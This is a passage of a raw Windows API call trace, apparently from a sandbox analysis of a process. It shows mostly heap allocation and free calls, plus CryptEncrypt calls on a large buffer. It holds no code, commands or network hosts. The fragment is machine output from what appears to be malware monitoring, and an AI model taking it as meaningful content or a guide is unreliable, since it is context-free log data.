(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0189.091] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11777, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11778) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0189.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0189.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0189.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.096] CharLowerBuffW (in: lpsz="byte[71544]", cchLength=0xb | out: lpsz="byte[71544]") returned 0xb [0189.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0189.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c02f48 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c146c8 | out: hHeap=0x970000) returned 1 [0189.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0189.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.176] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.180] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0189.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0189.180] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf17c8*, pdwDataLen=0x8cef60*=0x11777, dwBufLen=0x11778 | out: pbData=0x3bf17c8*, pdwDataLen=0x8cef60*=0x11778) returned 1 [0189.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0189.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0189.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, 